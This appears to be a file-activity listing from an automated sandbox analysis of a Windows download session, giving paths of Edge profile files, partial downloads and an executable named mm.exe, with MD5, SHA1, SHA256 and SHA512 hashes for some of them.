C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 66ac7ef295f5814c043db1e8d0bfbb3a |
| SHA1 | f2809e78cfbcc01e302b921717dcba13422ab7e3 |
| SHA256 | bb15637330e117684f4ebad0ce4e0802f956c17e8a6fb75bb1002220398226fb |
| SHA512 | 4782c135599c9ed9a884459ace42f319d12679fb10ab30eaf716fdf45c1109059bdbbecc886126b6871f6ea8467f7a92307e35e952db96b31adbbbd554c08c92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24e1432bd76ca878f68d2f172a93d8d7 |
| SHA1 | 59ce352023df47949233ef7d7c016b52242199af |
| SHA256 | 5b7735fff83d96ba4c292d35c80b0eefcb00214e99d633ff581110f0ab769f06 |
| SHA512 | fc06d032e13e611825b485360435a9ecffccdcf3e84bbbad784b9c57a262553a9b533a3b0e81d1f0c186dcb800210e8550ec5e36674e9605c4ed5f3400fb8178 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 807419ca9a4734feaf8d8563a003b048 |
| SHA1 | a723c7d60a65886ffa068711f1e900ccc85922a6 |
| SHA256 | aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631 |
| SHA512 | f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c |
C:\Users\Admin\Downloads\Unconfirmed 89513.crdownload
| MD5 | bc8fd990b9c93f3ad12cf1182edc645c |
| SHA1 | 42f8d317c15bad6427ffc63f4e2a34f52d68d6c1 |
| SHA256 | a4db7b7c3ad717682781f6c8eabfd714b573c40a351fd31b26a7eddadff0631a |
| SHA512 | 85b114d0ccc28595faefd1da1566cd45845a6e2db9bb45f357ff609bd34f57a277e93158aec374a24e1a900ebdee124b298d0f10ecb1e34b2f52dc8f11a7b778 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e79aaead465d73b27366b0022114d987 |
| SHA1 | c9083b3cb4ac8f245150241a80c0fd02a3d89edb |
| SHA256 | 2e5aa7ece56dd8f52f29525743a2f3469e3d5dbf98e40a4441548b821943ea3b |
| SHA512 | b5d2583d9d02a8f37bcb28ebda71e6676bf5a017fd95abb060745819f6156b8d63687009ef57c0c93127a55ce53e10b751d41793645b6ad622fbb432c99640d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 46d2467ecc7588f9c64e5fa7fb08fd77 |
| SHA1 | d939b726a7c458be0cbcb73beec902851d602a3d |
| SHA256 | a4562c37214dce20140f60aa8b05e96300ae2c0087e2a000e69a4dc72f81fa4b |
| SHA512 | 6b1040ccc901f263bacc3d97f10d53768af920c795747264e7e317ed85f14ba6ae99b358eb9daf8e8371d5431ff89460b10ad28ddf7023233a219c7fc55415e0 |
C:\Users\Admin\Downloads\Unconfirmed 871022.crdownload
| MD5 | 1585b761a886295049235a099cc3ddd7 |
| SHA1 | a2e6a8ee6c5722a063ccfee426ccb9b46604d306 |
| SHA256 | b8e814db0eee2eecce9ef6d8f3b21442e9f0cbcda564af6bff7c1a58b8de8347 |
| SHA512 | 952b838d2431fd74660da194b19d5516a275f8a840b06dd0b3dccf322dd2b3682404bdd1fabdbf15a5db62d480177859ea5edfea3cb4701917178ef97ca130b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b95231eb3312af5159413ab688fdb934 |
| SHA1 | 7610fa9c09b63e026ecf02f3484f1afbd7458dfa |
| SHA256 | 657cf3c19d3f6501179df8be28b49e98065b839b4da285a593db204e22f9d346 |
| SHA512 | fa8bce8c284320fe329cf9e7485f9155279350a21f9738b550af733381c1feb31a1468173def0a62a666763020d66cfa6f8c91f13fbeaa6d9595b169637924da |
C:\Users\Admin\Downloads\Unconfirmed 147682.crdownload
C:\Users\Admin\Downloads\Unconfirmed 329724.crdownload
C:\Users\Admin\Downloads\Unconfirmed 371741.crdownload:SmartScreen
C:\Users\Admin\Downloads\Unconfirmed 619887.crdownload
C:\Users\Admin\Downloads\Unconfirmed 812889.crdownload
C:\Users\Admin\Downloads\Unconfirmed 228742.crdownload
C:\Users\Admin\Downloads\Unconfirmed 49884.crdownload
C:\Users\Admin\Downloads\mm.exe
C:\Users\Admin\Downloads\Unconfirmed 545744.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eudwqjpd.iub.ps1